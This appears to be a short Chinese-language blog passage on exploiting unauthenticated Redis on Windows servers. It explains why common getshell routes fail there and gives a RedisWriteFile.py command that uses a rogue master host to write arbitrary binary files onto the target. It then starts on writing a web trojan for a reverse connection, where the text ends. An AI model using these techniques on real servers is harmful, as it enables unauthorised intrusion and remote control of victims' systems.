目录
前言
之前已经介绍了未授权访问的4种利用方式,这里再介绍一下4种利用方式的一些存在问题及绕过方式。
linux写shell很容易,但是windows的计划任务文件不是以文本格式保存在固定位置的,并且若利用写木马的方式要求该服务器开启了web服务;而windows的最新redis版本只有3.2也无法利用主从getshell;同时没有ssh服务。因此只有可能通过直接写shell的方式了。
0x01 写无损文件
redis直接写数据会携带脏数据,要想getshell可能要求你写二进制文件等,这时候我们可以利用主从复制写无损数据进去,可利用工具
命令如下python RedisWriteFile.py --rhost=[target_ip] --rport=[target_redis_port] --lhost=[evil_master_host] --lport=[random] --rpath="[path_to_write]" --rfile="[filename]" --lfile=[filename]
0x02 getshell
1.存在web
理想情况若存在web网站,可以直接写木马进行反连。